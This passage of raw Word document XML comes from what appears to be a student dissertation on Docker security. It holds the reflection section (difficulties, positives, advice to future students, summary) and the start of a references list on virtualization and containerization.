        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Inadequate</w:t>
      </w:r>
      <w:r w:rsidR="00101BD4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E20BF">
        <w:t xml:space="preserve">skills </w:t>
      </w:r>
      <w:r w:rsidR="00101BD4">
        <w:t>of Linux and scripting languages, specifically with creating Docker images</w:t>
      </w:r>
      <w:r w:rsidR="006B1645">
        <w:t>, was challenging</w:t>
      </w:r>
      <w:r w:rsidR="00101BD4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68415019" w14:textId="429571A2" w:rsidR="00101BD4" w:rsidRDefault="007E20BF" w:rsidP="00D15459">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Insufficient research papers o</w:t>
      </w:r>
      <w:r w:rsidR="006B1645">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the topic as it is </w:t>
      </w:r>
      <w:r w:rsidR="00304CB9">
        <w:t xml:space="preserve">a new technology. In particular, finding </w:t>
      </w:r>
      <w:r w:rsidR="006B1645">
        <w:t>pragmatically based papers related to Docker security was difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5BD0D0" w14:textId="333C8D43" w:rsidR="00922EAC" w:rsidRPr="00D73FAF" w:rsidRDefault="00D933B0" w:rsidP="00922EAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access to university resources and facilities w</w:t>
      </w:r>
      <w:r w:rsidR="00D73FAF">
        <w:t>ere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> restricted due to </w:t>
      </w:r>
      <w:r w:rsidR="00D73FAF">
        <w:t>nationwide lockdown because of the coronavirus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68522E" w14:textId="3938EDC8" w:rsidR="006B1645" w:rsidRDefault="00922EAC" w:rsidP="00922EAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00922EAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Positives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806D9A9" w14:textId="7ED962CE" w:rsidR="00922EAC" w:rsidRDefault="00922EAC" w:rsidP="00922EAC">
      <w:r>
        <w:t xml:space="preserve">The author has </w:t>
      </w:r>
      <w:r w:rsidR="00431A81">
        <w:t>acquired</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00431A81">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00894266">
        <w:t xml:space="preserve">wide range </w:t>
      </w:r>
      <w:r w:rsidR="00431A81">
        <w:t xml:space="preserve">of new skills and </w:t>
      </w:r>
      <w:r w:rsidR="00471B20">
        <w:t>enriched his knowledge in the area of cloud containerisation technologies, especially of Docker systems and security</w:t>
      </w:r>
      <w:r w:rsidR="001A3F70">
        <w:t>. Some of the positive aspects of the project are listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B084B9" w14:textId="57313899" w:rsidR="001A3F70" w:rsidRDefault="00003F88" w:rsidP="001A3F70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Good t</w:t>
      </w:r>
      <w:r w:rsidR="001A3F70">
        <w:t xml:space="preserve">ime management and </w:t>
      </w:r>
      <w:r>
        <w:t>effective planning were the main factors to the success of this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16553C59" w14:textId="78CCDBC0" w:rsidR="00462136" w:rsidRDefault="0083013B" w:rsidP="001A3F70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The consultation, </w:t>
      </w:r>
      <w:r w:rsidR="00334099">
        <w:t>guidance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and motivation given by the project supervisor have </w:t>
      </w:r>
      <w:r w:rsidR="00334099">
        <w:t>assisted the author</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F4EF9">
        <w:t>to prompt well-structured and professional work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32117A4B" w14:textId="4935AA3F" w:rsidR="00D73FAF" w:rsidRPr="00922EAC" w:rsidRDefault="00334099" w:rsidP="00D73FAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Being composed </w:t>
      </w:r>
      <w:r w:rsidR="00421FCD">
        <w:t xml:space="preserve">and staying focused </w:t>
      </w:r>
      <w:r w:rsidR="00A54108">
        <w:t xml:space="preserve">has helped the author </w:t>
      </w:r>
      <w:r w:rsidR="00D73FAF">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00A54108">
        <w:t>finish the project within the given time frame</w:t>
      </w:r>
      <w:r w:rsidR="006D2F34">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA006FC" w14:textId="62502D3B" w:rsidR="00922EAC" w:rsidRDefault="00D73FAF" w:rsidP="00922EAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466866">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guidance to the future students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E42BC4" w14:textId="339DE313" w:rsidR="00466866" w:rsidRDefault="00466866" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Find the research topic </w:t>
      </w:r>
      <w:r w:rsidR="00464A22">
        <w:t>at the very beginning</w:t>
      </w:r>
      <w:r w:rsidR="00DD4526">
        <w:t xml:space="preserve"> as the time allocated is very tight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1D1E5A" w14:textId="4F921D93" w:rsidR="00DD4526" w:rsidRDefault="00DD4526" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Establish good planning and </w:t>
      </w:r>
      <w:r w:rsidR="0038016D">
        <w:t>time management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F907F1B" w14:textId="440E39AC" w:rsidR="00B41D3F" w:rsidRDefault="00B41D3F" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify and prioritise tasks accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97D2A3" w14:textId="6B3E25C5" w:rsidR="0038016D" w:rsidRDefault="0038016D" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Communicate and collaborate with your project supervisor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72384D" w14:textId="77777777" w:rsidR="0038016D" w:rsidRDefault="0038016D" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Adhere and give attention to the advice given by your supervisor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1154C5" w14:textId="77777777" w:rsidR="0055661C" w:rsidRDefault="0055661C" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stick to the plan and stay purposeful throughout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3BDDBE" w14:textId="0F1197D0" w:rsidR="0038016D" w:rsidRDefault="008B5B7A" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Divide the project into small phases and units to stay on track.</w:t>
      </w:r>
      <w:r w:rsidR="0038016D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF019C7" w14:textId="77777777" w:rsidR="00467AC5" w:rsidRDefault="00242675" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stay organised and energetic to reach the project’s objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F9D1DE" w14:textId="41219F47" w:rsidR="00242675" w:rsidRDefault="00211F57" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Team up to work with other students and never</w:t>
      </w:r>
      <w:r w:rsidR="00B76E5C">
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> afraid to ask for help from other people.</w:t>
      </w:r>
      <w:r w:rsidR="00242675">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE7C899" w14:textId="72CA995A" w:rsidR="00211F57" w:rsidRDefault="00211F57" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Always stick to the laws and regulations of the university. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616A0622" w14:textId="41E831DF" w:rsidR="00211F57" w:rsidRDefault="00211F57" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attend meeting</w:t>
      </w:r>
      <w:r w:rsidR="00B76E5C">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with your supervisor regularly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAABA75" w14:textId="77777777" w:rsidR="00146DD2" w:rsidRDefault="00146DD2" w:rsidP="00B41D3F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284C97E8" w14:textId="399AA4A2" w:rsidR="00B41D3F" w:rsidRDefault="00B41D3F" w:rsidP="00B41D3F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B41D3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Summary </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9AF09E" w14:textId="108B22EB" w:rsidR="00B41D3F" w:rsidRDefault="00146DD2" w:rsidP="00B41D3F">
      <w:r>
        <w:t>Adding new skills is essential to further your knowledge and opens new opportunities</w:t>
      </w:r>
      <w:r w:rsidR="00B76E5C">
        <w:t xml:space="preserve"> and thus should be acquired and enriched.</w:t>
      </w:r>
      <w:r w:rsidR="006D1D23">
        <w:t xml:space="preserve"> The key to the success of any project is having effective </w:t>
      </w:r>
      <w:r w:rsidR="006D1D23">
        <w:lastRenderedPageBreak/>
        <w:t>planning and time management</w:t>
      </w:r>
      <w:r w:rsidR="00CC174F">
        <w:t xml:space="preserve"> along </w:t>
      </w:r>
      <w:r w:rsidR="006D1D23">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00CC174F">
        <w:t>having</w:t>
      </w:r>
      <w:r w:rsidR="00292D12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC174F">
        <w:t>reliable</w:t>
      </w:r>
      <w:r w:rsidR="00292D12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC174F">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00292D12">
        <w:t xml:space="preserve"> adequate resources.</w:t>
      </w:r>
      <w:r w:rsidR="000110A8">
        <w:t xml:space="preserve"> Regardless of its size, any project can fail without proper coordination and time management. Therefore, it is vital to religiously study and make plans to the smallest detail to achieve any project’s aims.</w:t>
      </w:r>
      <w:r w:rsidR="00CC174F">
        <w:t xml:space="preserve"> Finally,</w:t>
      </w:r>
      <w:r w:rsidR="00542CE4">
        <w:t xml:space="preserve"> it is critical to stay motivated and determined to accomplish and produce high-standard work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C73A35" w14:textId="2A10DCDF" w:rsidR="00AF513B" w:rsidRDefault="00AF513B" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="63F613C7" w14:textId="72619F0B" w:rsidR="00AF513B" w:rsidRDefault="00AF513B" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="261F5C76" w14:textId="1C2AF143" w:rsidR="00AF513B" w:rsidRDefault="00AF513B" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="36765B60" w14:textId="3C014D70" w:rsidR="00AF513B" w:rsidRDefault="00AF513B" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="190494A3" w14:textId="5FC6E79C" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="6CB046ED" w14:textId="419DEA95" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="623D32F7" w14:textId="60D90997" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="0151DA39" w14:textId="3C2D738E" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="36B6E6EE" w14:textId="21C5FD52" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="439409DB" w14:textId="214AF2F3" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="53570654" w14:textId="4C9AAB3E" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="64A8447C" w14:textId="26583685" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="21304E41" w14:textId="5536E775" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="365A5729" w14:textId="42CE89B3" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="08856EA6" w14:textId="01F288E3" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="507A10E1" w14:textId="75E66C37" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="23D28114" w14:textId="5DAEA2EC" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="0FAD1C97" w14:textId="7F2E930F" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="444A864E" w14:textId="77777777" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:bookmarkStart w:id="160" w:name="_Toc86859312" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="1706448841"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="27C3064C" w14:textId="5B4C30F6" w:rsidR="00A13BEC" w:rsidRDefault="00C748CB">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r>
            <w:t>REFERENCES</w:t>
          </w:r>
          <w:bookmarkEnd w:id="160"/>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-573587230"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w14:paraId="5BC7D417" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">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13BEC" w14:paraId="5500C851" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3E4A429D" w14:textId="321E9F08" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="41EA4FB6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>B. Wootton, “Contino,” Contino, 31 January 2017. [Online]. Available: https://www.contino.io/insights/whos-using-docker. [Accessed 21 October 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2B9B4598" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1A11A50B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[2] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="31F553C4" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">R. Kumar and S. Charu, “An Importance of Using Virtualization Technology in Cloud Computing,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Global Journal of Computers &amp; Technology, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 1, no. 2, pp. 56-60, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="34151C3D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7EC9A551" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[3] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="18D8111C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Mondesire, A. Angelopoulou, S. Sirigampola and et.al, “Combining Virtualization and Containerization to support interactive games and simulations on the cloud,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Simulation Modelling Practice and Theory, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 93, pp. 233-244, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1E2262CC" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="28E92B6D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[4] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1433B138" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">B. Đorđević, V. Timčenko, E. Nikolić and N. Davidović, “Comparing Performances of Native Host and Virtualization on ESXi hypervisor,” in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>20th International Symposium INFOTEH-JAHORINA (INFOTEH)</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, East Sarajevo, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="63A6CE3A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="28350174" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[5] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="148594B6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. R. Poojara, N. V. Dharwadkar and V. Ghule, “Performance Benchmarking of Hypervisors - A Case Study,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Indian Journal of Science and Technology, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 10, no. 44, pp. 1-11, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4D033C95" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1142652F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[6] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3B3074F2" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Bhardwaj and C. Krishna, “Virtualization in Cloud Computing: Moving from Hypervisor to Containerization—A Survey,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Arabian Journal for science and Engineering, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 2, no. 3, pp. 1-17, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3D1DAE61" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="103803B6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
